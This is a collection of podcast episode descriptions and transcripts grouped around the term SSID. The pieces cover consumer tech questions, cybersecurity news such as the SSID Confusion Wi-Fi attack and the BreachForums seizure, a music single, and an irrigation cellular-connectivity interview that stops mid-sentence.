On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
Car hacking et travail à distance Shamelessplug Hackfest Swag Join Hackfest/La French Connection Discord Join Hackfest us on Mastodon Nouvelles GM Just Killed Its Program That Sold Your Data After Uproar Guest commentary: EV mandates threaten grid reliability, security CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It? Airport offline L'article de Radio-Canada discute de la découverte de modems chinois dans des grues utilisées dans des ports aux États-Unis, soulevant des inquiétudes en matière de sécurité. Le premier ministre de la Colombie-Britannique, David Eby, a confirmé que l'Administration portuaire Vancouver Fraser est en discussion avec le gouvernement fédéral pour s'assurer que ces modems ne sont pas présents au Canada. La compagnie chinoise ZPMC, qui fabrique ces grues, a nié toute violation des lois locales. Des experts soulignent que le Canada doit agir plus rapidement face à de potentielles menaces d'ingérence. Le projet de loi S-210, intitulé “Loi sur la protection des jeunes contre l'exposition à la pornographie” Selon le site IPVM, Honeywell a cessé d'utiliser Dahua comme fournisseur OEM en 2022, mais a secrètement remplacé ce dernier par Sunell, un fabricant chinois. Cette stratégie est restée cachée, et Honeywell continue de dissimuler la provenance de ses produits, notamment ceux fabriqués par Sunell. Cette situation pose des préoccupations en matière de sécurité et de conformité, notamment par rapport aux réglementations américaines. Sunell, par ailleurs, a des liens avec la Russie, ce qui renforce les inquiétudes concernant l'intégrité et la transparence des produits de Honeywell. iSniff GPS est un outil qui intercepte passivement les requêtes SSID et les paquets ARP émis par les appareils sans fil, notamment les iPhones et iPads, pour collecter des données permettant d'identifier ces appareils et de déterminer leurs localisations géographiques passées, en utilisant les informations divulguées sur les réseaux WiFi précédemment connectés. Discussion: Santé Mental en sécurité de l'info. et droit à la déconnexion https://pratiquesrh.com/article/les-differentes-tendances-en-matiere-de-deconnexion 20240826 - MacLean's - The Terrifying Rise of Ransomware Gangs 20240826 - SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access Park'n'Breach! - Stationnement à Montréal-Trudeau: des données possiblement volées sur Park'N Fly 20240823 - Taking Action Against Malicious Accounts in Iran https://cyberscoop.com/meta-iran-apt42-whatsapp-trump-campaign-hack/ 20240826 - Microsoft: Exchange Online mistakenly tags emails as malware 20240825 - Pavel Durov, le fondateur de Telegram, interpellé à son arrivée en France 20240819 - PoC Exploit for Windows 0-Day Flaws CVE-2024-38202 and CVE-2024-21302 Released 20240826 - Des renseignements personnels mal protégés à Sherbrooke 20240820 - Services frontaliers: une panne de plusieurs heures dans les aéroports canadiens 20240823 - US oil giant Halliburton confirms cyberattack behind systems shutdown 20240819 - Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts 20240815 - Announcing mandatory multi-factor authentication for Azure sign-in 20240816 - OpenAI bans accounts linked to ‘covert Iranian influence operation' 20240819 - US intelligence agencies blame Iran for Trump campaign security incident 20240826 - Up to $2.5M Reward Offer for Information Leading to Arrest and/or Conviction of Belarusian National Volodymyr Kadariya La bonne nouvelle du jour Bravo au MCN et Félix Crew Patrick Mathieu Gabrielle Joni Verreault Steve Waterhouse Francis Coats Dominic Sigouin Crédits Montage audio par Hackfest Communication Locaux virtuels par Streamyard
Q&A201: Tips to shop privately online with the holidays approaching, private investment funds entering the Monero space, and is your SSID trackable? Join our next Q&A on Patreon: https://www.patreon.com/collection/415684?view=expanded or XMR Chat: https://xmrchat.com/surveillancepodWelcome to the Surveillance Report Q&A - featuring Techlore & The New Oil answering your questions about privacy and security..❤️ Support us on Patreon: https://www.patreon.com/surveillancepod
Droit à la déconnexion dans un monde connecté Nouvelles GM Just Killed Its Program That Sold Your Data After Uproar Guest commentary: EV mandates threaten grid reliability, security Bravo au MCN et Félix CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It? Airport offline L'article de Radio-Canada discute de la découverte de modems chinois dans des grues utilisées dans des ports aux États-Unis, soulevant des inquiétudes en matière de sécurité. Le premier ministre de la Colombie-Britannique, David Eby, a confirmé que l'Administration portuaire Vancouver Fraser est en discussion avec le gouvernement fédéral pour s'assurer que ces modems ne sont pas présents au Canada. La compagnie chinoise ZPMC, qui fabrique ces grues, a nié toute violation des lois locales. Des experts soulignent que le Canada doit agir plus rapidement face à de potentielles menaces d'ingérence. Le projet de loi S-210, intitulé “Loi sur la protection des jeunes contre l'exposition à la pornographie” Selon le site IPVM, Honeywell a cessé d'utiliser Dahua comme fournisseur OEM en 2022, mais a secrètement remplacé ce dernier par Sunell, un fabricant chinois. Cette stratégie est restée cachée, et Honeywell continue de dissimuler la provenance de ses produits, notamment ceux fabriqués par Sunell. Cette situation pose des préoccupations en matière de sécurité et de conformité, notamment par rapport aux réglementations américaines. Sunell, par ailleurs, a des liens avec la Russie, ce qui renforce les inquiétudes concernant l'intégrité et la transparence des produits de Honeywell. iSniff GPS est un outil qui intercepte passivement les requêtes SSID et les paquets ARP émis par les appareils sans fil, notamment les iPhones et iPads, pour collecter des données permettant d'identifier ces appareils et de déterminer leurs localisations géographiques passées, en utilisant les informations divulguées sur les réseaux WiFi précédemment connectés. Discussion 2: Santé Mental en sécurité de l'info. et droit à la déconnexion Discussion 1: Santé Mental en sécurité de l'info. et droit à la déconnexion 20240826 - MacLean's - The Terrifying Rise of Ransomware Gangs 20240826 - SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access Park'n'Breach! - 20240826 - Stationnement à Montréal-Trudeau: des données possiblement volées sur Park'N Fly 20240823 - Taking Action Against Malicious Accounts in Iran 20240826 - Microsoft: Exchange Online mistakenly tags emails as malware 20240825 - Pavel Durov, le fondateur de Telegram, interpellé à son arrivée en France 20240819 - PoC Exploit for Windows 0-Day Flaws CVE-2024-38202 and CVE-2024-21302 Released 20240826 - Des renseignements personnels mal protégés à Sherbrooke 20240820 - Services frontaliers: une panne de plusieurs heures dans les aéroports canadiens 20240823 - US oil giant Halliburton confirms cyberattack behind systems shutdown 20240819 - Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts 20240815 - Announcing mandatory multi-factor authentication for Azure sign-in 20240816 - OpenAI bans accounts linked to ‘covert Iranian influence operation' 20240819 - US intelligence agencies blame Iran for Trump campaign security incident 20240826 - Up to $2.5M Reward Offer for Information Leading to Arrest and/or Conviction of Belarusian National Volodymyr Kadariya Shamelessplug Hackfest Swag Join Hackfest/La French Connection Discord Join Hackfest us on Mastodon Invités spéciaux Dominic Sigouin Crew Patrick Mathieu Gabrielle Joni Verreault Francis Coats Steve Waterhouse Crédits Montage audio par Hackfest Communication Musique par Resonant Warrior – AIYIA - Durga Gayatri Locaux virtuels par Streamyard
From an SSID confusion exploit to a RADIUS attack to a critical vulnerability in a Windows Wi-Fi driver, the past several months have seen multiple attacks and exploits targeting the wireless realm. On today's Packet Protector podcast we talk with Wi-Fi security expert Stephen Orr to get his take on the severity of these issues,... Read more »
From an SSID confusion exploit to a RADIUS attack to a critical vulnerability in a Windows Wi-Fi driver, the past several months have seen multiple attacks and exploits targeting the wireless realm. On today's Packet Protector podcast we talk with Wi-Fi security expert Stephen Orr to get his take on the severity of these issues,... Read more »
https://youtu.be/b_KBOKn1IPo This week on the podcast, we cover a newly disclosed weakness in the 802.11 Wi-Fi standard that affects common enterprise Wi-Fi deployments. Before that, we discuss CISA's Secure by Design Pledge for technology vendors before ending with a Microsoft research post on Quick Assist social engineering.
Security systems are increasingly vulnerable to a variety of threats, as discussed in the podcast episode. Issues such as DNS tunneling, Wi-Fi vulnerabilities like the SSID Confusion attack, and weaknesses in voice assistants like Siri and Google Assistant highlight the critical need for robust security measures. DNS tunneling, as seen in campaigns like TrickCDN and SexShow, allows threat actors to encode data in DNS queries, evade network firewalls, and execute command-and-control operations. To address this risk, organizations are advised to deploy DNS monitoring and analysis tools to detect unusual traffic patterns and restrict DNS resolvers. Similarly, the SSID Confusion attack exploits a flaw in the IEEE 802.11 Wi-Fi standard, deceiving users into connecting to insecure networks and enabling attackers to intercept network traffic. Proposed solutions include updating the Wi-Fi standard to include the SSID in the four-way handshake and enhancing beacon protection. The podcast episode emphasized the increasingly complex role of Chief Information Security Officers (CISOs) due to various factors. One key challenge is the mounting legal pressure on CISOs, particularly with the rise in ransomware attacks. CISOs often bear responsibility for cybersecurity incidents, despite potential limitations in organizational authority and reporting structures that may hinder their ability to enact necessary security changes effectively. Three things to know today 00:00 Critical Analysis: Who Bears Responsibility When Security Systems Fail?05:46 Tech Companies See Senior Talent Drain Amid Stricter Office Return Mandates08:18 The Tough Reality of CISO Roles: Balancing Security Demands with Limited Authority Supported by: https://coreview.com/msp/https://mspradio.com/engage/ All our Sponsors: https://businessof.tech/sponsors/ Looking for a link from the stories? The entire script of the show, with links to articles, are posted in each story on https://www.businessof.tech/. Do you want the show on your podcast app or the written versions of the stories? Subscribe to the Business of Tech: https://www.businessof.tech/subscribe/ Support the show on Patreon: https://patreon.com/mspradio/ Want our stuff? Cool Merch? Wear “Why Do We Care?” - Visit https://mspradio.myspreadshop.com Follow us on:LinkedIn: https://www.linkedin.com/company/28908079/YouTube: https://youtube.com/mspradio/Facebook: https://www.facebook.com/mspradionews/Instagram: https://www.instagram.com/mspradio/TikTok: https://www.tiktok.com/@businessoftechBluesky: https://bsky.app/profile/businessoftech.bsky.social Looking for a link from the stories? The entire script of the show, with links to articles, are posted in each story on https://www.businessof.tech/ Do you want the show on your podcast app or the written versions of the stories? Subscribe to the Business of Tech: https://www.businessof.tech/subscribe/ Support the show on Patreon: https://patreon.com/mspradio/ Want our stuff? Cool Merch? Wear “Why Do We Care?” - Visit https://mspradio.myspreadshop.com Follow us on:LinkedIn: https://www.linkedin.com/company/28908079/YouTube: https://youtube.com/mspradio/Facebook: https://www.facebook.com/mspradionews/Instagram: https://www.instagram.com/mspradio/TikTok: https://www.tiktok.com/@businessoftechBluesky: https://bsky.app/profile/businessoftech.bsky.social
In today's episode, researchers unveiled a new security vulnerability dubbed SSID Confusion attack exploiting a flaw in the IEEE 802.11 Wi-Fi standard, allowing malicious actors to manipulate victims into connecting to rogue networks to eavesdrop on their traffic. The breach forum known as BreachForums was seized by law enforcement agencies, marking the second takedown within a year. Also, the Kimsuky hacking group has launched a social engineering attack targeting activists in North Korea and anti-North Korea sectors by impersonating individuals on Facebook Messenger to distribute malware. The episode further delves into the sophisticated malware that infected the Linux kernel.org infrastructure for two years, compromising encrypted password data and providing insights into the propagation tactics employed by the malware. Original URLs: 1. https://thehackernews.com/2024/05/new-wi-fi-vulnerability-enabling.html 2. https://thehackernews.com/2024/05/fbi-seizes-breachforums-again-urges.html 3. https://thehackernews.com/2024/05/north-korean-hackers-exploit-facebook.html 4. https://arstechnica.com/security/2024/05/ssh-backdoor-has-infected-400000-linux-servers-over-15-years-and-keeps-on-spreading/ Search phrases: 1. Preventing SSID Confusion attack 2. Protecting network traffic from Wi-Fi spoofing 3. Law enforcement takedown of cybercrime forums 4. Fate of Baphomet and ShinyHunters 5. Kimsuky hacking group tactics 6. Social engineering attacks on Facebook Messenger 7. Malware targeting North Korean activists 8. Linux malware infection 9. Ebury malware impact on network security 10. Minimizing Ebury malware spread [00:00:00] A new security vulnerability known as the SSI D confusion attack manipulates devices, and to connecting to a different, less secure network than intended. Potentially exposing users, traffic. How can the SSI D confusion attack be prevented? And what steps should users take to protect their network traffic from being intercepted through wifi spoofing. Law enforcement agencies in collaboration with the FBI and international partners from Australia, Iceland, New Zealand, Switzerland, the UK and Ukraine have taken down the cyber crime forum breach forums for the second time. The Kim Suki hacking group is leveraging fake Facebook accounts to launch social engineering attacks via messenger. Targeting activists in the north Korean human rights and anti north Korean sectors with malware delivered through decoy documents. The Linux operating systems, Colonel infrastructure was infected by malware revealing the theft of encrypted password data from over [00:01:00] 550 system users and allowing attackers to send spam from the servers. How can organizations minimize the spread and impact of the Ebery malware to prevent disruptions to the network security? You're listening to the daily decrypt. Imagine connecting to your trusted wifi network only to find out later that an attacker intercepted your traffic. Wifi is pretty important technology. Allows us to connect our devices to the internet wirelessly. We rely on different. Coffee shops, vendor locations to connect to the internet and maybe in some areas where we are. Sell services. And to reliable, we'll use local wifi. I often have to use target wifi because the target in my area is in a cellular dead zone. So it's pretty crucial for. Day-to-day lives. The SSI de confusion attack impacts all operating systems and wifi clients, including home and mesh networks using WEP w P a 3 8 [00:02:00] 0 2 11 X E a P and a M P E protocols. That's a lot of jargon for all the different security standards that come with wifi. The method involves downgrading victims to a less secure network by spoofing a trusted network name or SSI D so attackers can intercept to their traffic to carry out further attacks. Now the SSI D stands for service set identifier, essentially the name of a wifi network. It helps devices recognize and connect to the correct network. However, the wifi standard doesn't require the SSI D to always be authenticated, which is where the vulnerability comes in. Attackers can deceive a client into connecting to an untrusted wifi network instead of the intended one by staging an adversary in the middle or AIT M attack. For example. When the victim wants to connect to a network named trusted net. The attacker tricks it into connecting to a network called wrong net. With similar credentials. The victim's device shows it's [00:03:00] connected to trusted net while it's actually connected to wrong net. And AIT M attack the adversary in the middle. Is where an attacker secretly intercepts and possibly alters the communications between two parties who believe they are directly communicating with each other. This allows the attacker to eavesdrop on or manipulate the communication. A successful SSI, D confusion attack can also disable any VPN that automatically turns off on trusted networks. Exposing the victims, traffic. The prerequisite for pulling off this attack include the victim, wanting to connect to a trusted wifi network. The presence of a rogue network with the same authentication credentials and the attacker being within range to perform the AETM attack. To counter SSI D confusion proposed mitigations include updating the 8 0 2 11 wifi standard to incorporate the SSI D as part of the four way handshake when connecting to product protected networks. Improvements to beacon protection can also help beacons or management frames that a wireless access point [00:04:00] transmits to announce its presence and capabilities. Networks can avoid this attack by not reusing credentials across SSI, DS. And by using unique passwords. The main takeaways from this are to really just ensure that your wifi network has a unique SSI. D again, that's the network name? That is not commonly used by default configurations or routers. So basically just avoid using the generic names like home net gear, LyncSys bell connect, whatever. Your ISP might utilize. And then of course, go in and change those passwords and use something unique for your networks. Additionally always make sure that your devices are up to date. Regularly patch, any routers or wifi access points that you have within your systems, along with your personal devices, anything that is going to be connecting to wifi? Now your exposure for home network is probably a bit more limited, but. As you're out roaming and going to different areas. One of the things to keep in mind is maybe make sure that your phone has auto connect turned off for any wifi. That is outside of your [00:05:00] house or place of business. This way, it gives you an opportunity to actually look at the network and verify its authenticity. And of course, double check those SSI D names. That's a big one with a lot of these. I had actually came across my first Rogue wifi. Out in the wild. A couple months back, I was traveling, so I wasn't even in my home. State. And I went to a coffee shop that I was familiar with. And sat down to get some work done. Open on my laptop and starting looking at the wifi networks. And I noticed, of course, there's the coffee shop that I was at. And it was password protected. And then there was. Another access point for a store that was right next, next door. And it had the name in the SSI D spelled correctly. Then there was another access point. For the same store, however. The eye in the store, his name was replaced with an exclamation mark, mark. And it was the [00:06:00] strongest Wi-Fi. Access point available and it did not have a password. Safe to assume that was the rogue access point. Unfortunately, I couldn't get in touch with anybody at the store, but. Just It exists out there and you do need to be vigilant, pay attention to those wifi names. In addition to that, if you are connecting to wifi, If you have the capabilities you use a VPN, make sure that is set up and running. And then another step is if you're ever in a public location using wifi and a website that you're visiting pops up with that certificate error. That you're probably familiar with. Do not click through it. That is the biggest red flag. When you're in a public area using someone else's wifi, not immediately means that they could be intercepting your traffic. And other news law enforcement agencies, including the us FBI and [00:07:00] international partners have seized control of a breach forums platform for the second time in a year, replacing the website with a seizure banner and the collaborative effort involved authorities from Australia, Iceland, New Zealand, Switzerland, the UK, the us and Ukraine. Indicating a global response to cyber crime. Following the arrest of the previous administrator Connor, Brian Fitzpatrick. Bafflement took over. As the forums administrator with the FBI now controlling the associated telegram channel as well. The FBI is actively seeking information on cyber criminal activities related to breech forums, encouraging individuals to report any relevant details to assist in ongoing investigations. While it remains unclear whether Baffin Mont and shiny hunters, another administrator have been arrested the seizure banner with features their profile pictures with a depiction of them behind bars. Breech forum served as a marketplace for cybercriminals to engage in illicit activities, such as trading stolen data access devices. [00:08:00] Identification means hacking tools, breach database, and other illegal services. The history of breach forums includes its emergence in 2022. After the takedown of raid forums. Followed by a shutdown in 2023 and a subsequent resurgence under new management before the recent law enforcement intervention. The hacking group, LinkedIn North Korea has launched a new social engineering attack using fake Facebook accounts to target individuals via messenger and distribute malware. The attack involves creating a Facebook account, impersonating a public official in the north Korean human rights field to deceive activists in the north Korean human rights and anti north Korean sectors. Unlike traditional spear fishing through emails. This campaign uses Facebook messenger to trick targets and to opening. Seemingly private documents hosted on one drive disguised as Microsoft common console documents. The decoy [00:09:00] docs appear as essays or content related to trilateral summit between Japan, South Korea in the U S potentially indicating a focus on targeting specific individuals in Japan and South Korea. By using uncommon MSC files and disguising them as innocuous word files come Suki aims to evade detection and increase the chances of infecting victims. Once malicious documents are opened. Victims who launched the MSC file are and agree to open it. Using Microsoft management console are shown a console screen containing a word document that triggers the attack sequence. Establishing a connection with an adversary controlled server to exfiltrate information. The command and control server can harvest IP addresses, user agent strings, timestamp info, and deliver additional payloads aligning with prior Kim Suki activities, such as the distribution of recon shark malware. South Korean cybersecurity company, Jenny ans highlighted the rise of personalized [00:10:00] social media attacks, emphasizing the importance of early detection to mitigate the impact of such targeted threats. That may go undetected by traditional security monitoring. For those of you tech enthusiasts and cybersecurity professionals out there. I think one of the things that was brought up a lot in my early studies anyways, was how secure and reliable Linux is. And. Not a lot of malware was targeting Linux. And if you didn't already figure it out, that is. Far from the truth. And especially dating back to 2009 to 2011. There was a hidden bank door within the Linux operating system that went undetected for years. This story from ARS Technica discusses, some malware that was affecting over 400,000 Linux systems. Between 2009 and 2011, the central hub for [00:11:00] Linux development. colonel.org was infiltrated. The breach compromise, encrypted passwords of over 550 users, enabling attackers to control the servers and carry out malicious activity. Linux is an open source operating system that powers everything from servers to smartphones. It's critical for maintaining the backbone of the internet and many other digital services. The attackers targeted the Etsy shadow files. Which store encrypted passwords. By cracking these encrypted passwords, they accessed and controlled the servers, sending spam and conducting other nefarious activities. The NC shadow file store encrypted passwords for user accounts. If these are compromised, attackers can potentially decrypt the passwords and gain on authorized access to systems. The malware dubbed Ebery. Created a backdoor in open SSH, allowing remote access without valid passwords. This infection spread to 25,000 servers in less than two years. [00:12:00] Highlighting the malware's extensive reach and impact. Open SSH is a suite of secure networking utilities based on secure shell SSH protocol. It's used to secure remote connections. By compromising open SSH, the attackers could intercept credentials and spread the infection to other systems. The malware was sophisticated, installing root kits, like phalanx and backdoors, , which were hard to detect. These tools allowed the attackers to maintain control and avoid detection by traditional security measures. Rootkits are collections of software tools that enable unauthorized access to a computer or network often hiding their presence or the presence of other malware in general, refers to a malicious software designed to disrupt damage or gain unauthorized access to computer systems for two years, the attackers quietly harvested passwords and controlled key servers within the Linux development network. Despite the severity of this breach, the full extent wasn't known until much later. In 2014, Essent researchers [00:13:00] discovered that the Avery malware had a far reaching impact, infecting not only Linux, but also free BSD, open BSD Sonoma, west servers, and even one Mac. The malware's ability to spread and its continuous evolution over the years, underscore is potency. The Linux community renowned for its security and transparency faced a significant challenge. The infection of colonel.org demonstrated that even the most secure systems are not immune to sophisticated cyber threats. The Avery malware has proven to be a formidable adversary, exploiting weaknesses and systems that many believe to be secure as we move forward. It's crucial for both individuals and organizations to remain aware of the evolving landscape of cyber security threats and to implement robust security measures to protect their digital assets. [00:14:00]
Vulnrichment (I just like saying that word), Trustworthy Computing Memo V2, SSID confusion, the Flipper Zero accessory for Dads, the state of exploitation, Hackbat, Raspberry PI Connect, leaking VPNs, exploiting faster?, a new Outlook 0-Day?, updating Linux, and a 16-year-old vulnerability. Show Notes: https://securityweekly.com/psw-829
Vulnrichment (I just like saying that word), Trustworthy Computing Memo V2, SSID confusion, the Flipper Zero accessory for Dads, the state of exploitation, Hackbat, Raspberry PI Connect, leaking VPNs, exploiting faster?, a new Outlook 0-Day?, updating Linux, and a 16-year-old vulnerability. Show Notes: https://securityweekly.com/psw-829
Has cryptocurrency done more harm than good? Our guest for this segment has some interesting views on its impacts! Vulnrichment (I just like saying that word), Trustworthy Computing Memo V2, SSID confusion, the Flipper Zero accessory for Dads, the state of exploitation, Hackbat, Raspberry PI Connect, leaking VPNs, exploiting faster?, a new Outlook 0-Day?, updating Linux, and a 16-year-old vulnerability. Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-829
Has cryptocurrency done more harm than good? Our guest for this segment has some interesting views on its impacts! Vulnrichment (I just like saying that word), Trustworthy Computing Memo V2, SSID confusion, the Flipper Zero accessory for Dads, the state of exploitation, Hackbat, Raspberry PI Connect, leaking VPNs, exploiting faster?, a new Outlook 0-Day?, updating Linux, and a 16-year-old vulnerability. Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-829
In his latest single, "Ginja Me," Swiss-based artist SSID teams up with Nigerian Afrobeats sensation Nicki Brown to deliver a vibrant fusion of modern pop, Afrobeats, and hip-hop swagger. With their infectious energy and catchy melodies, the duo invites listeners on a musical journey that celebrates love, joy, and the power of connection. --- Support this podcast: https://podcasters.spotify.com/pod/show/wewriteaboutmusic/support
In this Episode, Andy talks with OptConnect CEO Chris Baird, and National Sales Justin Nichols. www.OptConnect.com ========== Andy: For those of you listening that this might be the first time you've heard about OptConnect, I encourage you to go listen to Episode #73 that Justin and I recorded probably a year and a half ago. Something like that year and a half ago, two years ago, and that'll be kind of like level one cellular connectivity intro, how it works, the benefits, all those sorts of things. What I want to do today is kind of hear from both Justin and Chris on where things, where their business has evolved since kind of. Entering the irrigation market. Justin: Yeah, that's awesome. Uh, you know, we entered the irrigation market about three years ago and we knew that we had a very good value prop based on, you know, other markets that were very active in, in our market leaders. And, and over the last two and a half, three years, you know, we've really started to scale in the irrigation market. I think today we have about. Four out of five of the large, you know, national distributors set up to be able to supply OpConnect hardware and services and about a dozen, uh, regional distributors as well. So if you haven't heard of us, chances are it is locally available at your, you know, landscape irrigation supply house. Uh, also just recently during smart irrigation month. We launched our brand new Ascend Dura device. And what's really cool about the Ascend Dura is it basically functions like a wifi hotspot on your phone. And so for the last couple of years, you know, we've really, uh, tried to penetrate the central control market. Uh, and now we have a new tool in our tool belt that allows us to connect to wifi only type of controllers. So you're. Your Hydra wise, your beehives, your ratios and any other type of wifi only type of gateway, uh, to be able to provide the same type of high level managed service to be able to troubleshoot. Now, not only the cellular side of that, but also the wifi side of that. So you can now bring your own wifi solution, plug and play and let us. Hit the easy button for you. Andy: Okay. Wow. So there's a whole bunch happening there and some of this I wasn't quite aware of. So why don't we step back? Because I had always thought of OpConnect as, as cellular, but you just said a bunch of wifi. So how does cellular and wifi come together? Justin: Yeah. So basically the wifi allows you to connect locally to a piece of equipment, just like you would in your house. Uh, and so we're able to make a local network connection via wifi. to that wifi only irrigation controller that allows the user to connect with a cellular device when otherwise they would have no means or way of connecting that external device. So we collect connect locally via the wifi network. But then all the communication is done on the cellular side. So when you're trying to do remote management, uh, Monitoring of a site like this, that's using a wifi only controller, whether it's light commercial, your own personal property, a vacation rental. We're able to manage that now remotely over the cellular network. And because of our managed service value prop, we can actually troubleshoot. Both types of those connections with the wifi. Andy: So can we like get a tangible example? Let's name a controller just to give this some context. Could we say like a Hunter Hydrawise controller? Would that make sense to talk about that? And just to try to, you know, have it more tangible. Justin: Yeah, absolutely. So you have a Hunter Hydrawise controller. Uh, you know, has 48 plus zones. If I remember correctly, they can go on a lot of light commercial properties. The cost is a little bit less expensive than that commercial unit, but you're relying on that property owner or that site's wifi connection. Perhaps they won't let you on their network. Perhaps the wifi signal isn't strong enough. We're able to put a cellular device that acts as a Wi-Fi hotspot inside that controller or right next to it and allow any type of Hydrawise user to manage that system remotely over an OpConnect cellular network. Andy: Okay. So you bring another device, your brand new device, and let's talk about that device. Is it one device? Is it two devices? How do you get from the cellular cloud down to the Wi-Fi LAN or local Wi-Fi? Justin: Yeah, it's all it's just one device. So basically, we have the, the Wi-Fi technology and the cellular technology baked into a single device. It's fully plug and play, we can provide a NEMA 4x enclosure. So if it's You know, an outdoor install and you don't want to mount it inside that Hydrawise controller cabinet. We can just install it right next to it. There's no wiring that you would have to run between the two. And it's, it's very simple. It's, it's activated, ready to go out of the box. The Wi-Fi is turned on. We give you, you know, the SSID and password to manage that. We can change that on your behalf. Uh, you really don't have to worry about anything when it comes to setting up that local Wi-Fi network or managing it over the cellular network. Hmm. Andy: Wow. Wow. Okay. A couple of things I'm thinking, is this a single controller device or can you connect multiple controllers or even other devices to it? Justin: Yeah, absolutely. So just like you would with your iPhone, if you're traveling and you and your work colleague are trying to get on a Zoom call or check your email. We can connect multiple wifi devices to this single device. Uh, it also has four ethernet ports. So if we wanted to, we could actually hardwire four controllers into it as well. Uh, but yes, any type of wifi equipment that the landscape property manager or whoever it is. Uh, is, is utilizing at that site. We can connect everything that they have at that site, uh, within a, within a reasonable distance, obviously, uh, to the wifi, to the Ascendera device. Hmm. Andy: Does that change, you know, so thinking historically irrigation controllers don't really use a lot of bandwidth, right? There's just not a lot of bandwidth. What is the bandwidth of this device? And I ask because I'm just curious. Because somebody may want to, you know, get on their phone and watch YouTube, and from an irrigation perspective, that's a lot of data that historically hasn't been required. But how does that translate to the new device? Yeah, so the new Justin: device is called a LTE Cat 4. So that is kind of your baseline fast type of device, uh, similar speed to, you know, web browsing or, or app browsing on an iPhone. And so it's going to have the speed and bandwidth to connect multiple controllers or pieces of, you know, equipment that, that communicate via wifi. Simultaneously, so you're not going to have any lag, any delay, uh, any timeouts in your communication probably wouldn't, uh, advocate for them to use it as a hotspot to, to stream, you know, YouTube on just because there are data plans on the cellular side associated with that. Uh, and you don't want to, uh, get dinged for, for using a couple of gigs of data when your irrigation controllers are maybe set up for, you know. 250, 500 megabytes of data Andy: online. And I was kind of asking, not because I think someone's gonna get out their phone and start watching YouTube, but maybe there's an opportunity for a contractor to mention this to maybe, um, a municipality or a school district, something like that, so that they, the, you know, the client can get extra usage out of the device. Absolutely. And use it to operate other equipment that happens to be on the site. Yeah, Justin: absolutely. And so when you get into some of these commercial installs, you know, outside of just the wifi-only type controllers, you may have four or five, six controllers in a utility room, and we could connect all of those with a single device Andy: now. Wow. Cool. So I'm, I'm wondering if this would be a good time to discuss if a, if a contractor or a client, you know, is thinking of a control system, you know, XYZ, let's not name any names, controller XYZ, and that. The brand manufacturer offers on their own, both wifi and cellular, you know, how, what type of decision would they make or how would they make the decision to use OptConnect and choose, you know, this device that you're talking about the wifi hotspot or just your, you know, standard cellular device. Justin: Yeah, it would probably be a decision based on what their current infrastructure, you know, is in that area. Um, the device can support five Ethernet-based connections. No, I would probably still advocate for hardwiring it in. Um, but otherwise, yeah, uh, they would have the ability now with multiple tools in the tool belt to make an even more informed decision as to how they're going to connect their equipment or other equipment. Uh, in their room that they want to be able to remotely manage. Andy: Mm-hmm. Mm-hmm. Yeah. As well as I'm just thinking, uh, you know, my brain's just turning here. I'm thinking that there's a benefit to knowing that OptConnect is, you know, supporting the brand manufacturer with the installation so that the client doesn't have to worry about how reliable is the brand manufacturer's cellular. This takes that question away because now they can look at Your company OptConnect and see that this is what you do. So it almost like may reduce the risk of using, you know, an irrigation brand manufacturer. Cellular service. Chris: You, you bring up a really good point, Andy. And, and in our world, you know, we think of connectivity as more than just connecting it to a, uh, to a cellular tower and then allowing that to, to roam. If you were to use OptConnect over a different solution, say one of the brand manufacturers, there's an entire team at OptConnect that's dedicated to watching for certain events like overages and outages. We're watching to make sure that that device has a healthy connection. We're taking autonomous action. If it doesn't, uh, we're on the back end providing support in the event that, uh, the, the installer or the end user has additional questions or needs support. You know, anybody can pick up our phone and be talking to an agent in 30 seconds or less, get live technical support, single call resolution. There's the, uh, a layer that OpConnect brings, uh, professionalism. and satisfaction, if you will, to an operator that they might not get anywhere else so that they don't have to think about it. We know that in the world of IOT internet of things. If there is not a reliable eye, there is not a reliable tee. And we try to bring that stability so that an operator can go do what they're best. They're not best at sitting behind a computer screen watching for connectivity to drop. We are. They love to be out moving on to the next deal, making sure the grass is green, the client's happy and that everybody is, uh, is satisfied at knowing. That, that controller's connected reliably to the internet. Mm hmm, mm Andy: hmm. And I think as soon as, um, a contractor or client experiences an outage, uh, or when I say outage, I mean the controller's offline, let's, let's say it that way. The device is offline. A lot of the time, brand 